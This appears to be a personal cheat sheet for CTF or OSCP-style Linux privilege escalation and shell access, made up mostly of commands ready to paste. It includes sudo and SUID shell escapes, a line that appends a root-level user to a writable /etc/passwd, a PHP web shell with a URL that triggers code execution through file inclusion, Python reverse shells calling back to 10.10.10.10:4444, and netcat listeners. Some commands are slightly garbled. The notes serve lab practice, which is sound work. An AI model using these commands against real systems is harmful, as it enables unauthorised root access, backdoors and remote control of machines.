Find IP of the machine
export IP=<MACHINE_IP>
export MACHINE_NAME=<MACHINE_NAME>
Set folder structure
cd ctf/
mkdir -p $MACHINE_NAME/enum
mkdir -p $MACHINE_NAME/files
touch $MACHINE_NAME/enum/users.txt
cp templates/report.md ctf/$MACHINE_NAME/${MACHINE_NAME}.md
Set hostname in etc/hosts (if helps)
privileges escalation
sudo -l
relative path exploitable?
Example: sudo /sudo_permited_location/../home/user/my_file
sudo /sudo_permited_location/../home/user/my_file
password re-use
from credentials founds in enum
su - <user>
Stabilize Shell $
which python -> python is here
which python
python -c 'import pty; pty.spawn("/bin/bash")' -> interactive terminal spawned via python
python -c 'import pty; pty.spawn("/bin/bash")'
tty quick test
tty
export TERM=xterm-256color ⇾ export our terminal
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color-auto' ⇾ export ll command
alias ll='clear ; ls -lsaht --color-auto'
stty raw -echo; fg; reset -> stable shell by control Z & backgrounding it
stty raw -echo; fg; reset
stty columns 200 rows 200
e.g: sudo /usr/bin/mysql -e '\! /bin/sh' sudo nopass for mysql
sudo /usr/bin/mysql -e '\! /bin/sh'
netstat -tupanl | grep -i '127.0.0.1' -> anything running on loopback
netstat -tupanl | grep -i '127.0.0.1'
Netstat alternative ss -tunlp
ss -tunlp
cat /etc/crontab
find / -perm -u=s -type f 2>/dev/null
The first step is to identify all programs or files that have SUID bits enabled
example
/usr/bin/zsh
Read Source Code (if any)
look for files owned by root grouped by user.
ps aux | grep -i 'root' --auto-color <-- anything running as root?
ps aux | grep -i 'root' --auto-color
lateral machines? (not done anything like this)
private ip address? (not done anything)
web root -> any db credes?
Take advantage of this misconfiguration by abusing the PATH variable
Take advantage of misconfigured cronjob.
find / -perm -u=g -type f 2>/dev/null -> Are there any GUID
find / -perm -u=g -type f 2>/dev/null
ps ps auxwf -> Check for any writeable Or,
ps ps auxwf
find / -type f -user root -perm /o=w | grep -v '/proc/
File transfer
Python http.server
simple HTTP server
download pspy
Second shell -> pspy<BIT>
pspy<BIT>
getcap -r / 2>/dev/null -> Are there any extended permissions
getcap -r / 2>/dev/null
exploit miss-configuration
writeable passwd?
passwd
perl -le 'print crypt("PassWord","addedsalt")'
echo "nullBrain:saltedvaluefromabove:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
Privilege escalation Enum
https://github.com/diego-treitos/linux-smart-enumeration (is this allowed in OSCP?)
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS (is this allowed in OSCP?)
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
kernel exploits?
https://github.com/mzet-/linux-exploit-suggester
e.g Dirty Cow example HowTo
world writable exploit
echo "<?php system('chmod +s /usr/bin/find'); ?>" > /stuffed
Using find related exploit
find .-exec /bin/bash -p \; -quit
Remote Code Execution
<?php system($_GET['cmd']);?>
Verify RCE
e.g : http://$IP/<path>/?lang=/var/ftp/pub/backdoor.php&cmd=id.`
http://$IP/<path>/?lang=/var/ftp/pub/backdoor.php&cmd=id
Payload:
https://github.com/nullbr41n/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
payload converter (hURL)
hURL -U export RHOST="$IP"; export RPORT="$PORT";python -c xxxx
python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Reverse Shell
web uploads
nc - nlvp 1 Listening on port 1
nc - nlvp 1
Listening on port 1
Upload payload on other side, should open connection
check RCE section.
python/python3 -c 'import pty; pty.spawn("/bin/bash")' -> import valid tty
python/python3 -c 'import pty; pty.spawn("/bin/bash")'
Last updated 1 year ago